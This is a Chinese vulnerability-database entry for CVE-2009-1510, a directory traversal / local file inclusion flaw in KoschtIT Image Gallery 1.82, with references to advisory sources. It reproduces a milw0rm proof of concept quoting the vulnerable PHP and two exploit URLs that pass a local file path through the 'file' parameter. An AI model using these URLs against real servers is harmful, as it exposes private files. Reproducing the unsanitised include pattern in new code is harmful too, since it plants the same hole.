投稿
https://www.exploit-db.com/exploits/8334
https://cxsecurity.com/issue/WLB-2009050100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-031
KoschtIT Image Gallery 'ki_makepic.php和ki_nojsdisplayimage.php' 文件目录遍历漏洞
| 漏洞ID | 1117546 | 漏洞类型 | 路径遍历 |
| 发布时间 | 2009-04-01 | 更新时间 | 2009-05-04 |
 CVE编号
|
CVE-2009-1510 |  CNNVD-ID
|
CNNVD-200905-031 |
| 漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
KoschtITImageGallery1.82版本中存在多个目录遍历漏洞。远程攻击者可以借助对(1)ki_makepic.php和(2)ki_base/的ki_nojsdisplayimage.php的文件参数中的目录遍历序列,包含和允许任意本地文件。
|漏洞EXP
:local file include:
#############################
script: koschtit_image_gallery(v1.82)
##############################################################
download from:http://koschtit..tabere.net/download/
or http://koschtit.tabere.net/en/#getit
##############################################################
vul:/ki_base/ki_makepic.php
if(isset($_GET['file']))
$file = "../ki_galleries/".$_GET['file'];
else
exit();
$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
if(is_file("../ki_config/".$gallery."_ki_setup.php"))
include_once("../ki_config/".$gallery."_ki_setup.php");
$imgsize = getimagesize($file);
#############
vul:/ki_base/ki_nojsdisplayimage.php
$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
include_once("../ki_config/ki_setup.php");
if(is_file(".../ki_config/".$gallery."_ki_setup.php")){
include_once("../ki_config/".$gallery."_ki_setup.php");
}
.
.
$srcfile = "../ki_galleries/".$file;
$imgsize = getimagesize("../ki_galleries/".$file);
##############################################################
xpl:
path/ki_base/ki_makepic.php?file=[local_file]
path/ki_base/ki_nojsdisplayimage.php?file=[local_file]
------------------------------------------------------------
# milw0rm.com [2009-04-01]|参考资料
来源:BID
名称:34335
链接:http://www.securityfocus.com/bid/34335
来源:MILW0RM
名称:8334
链接:http://www.milw0rm.com/exploits/8334
检索漏洞
开始时间
结束时间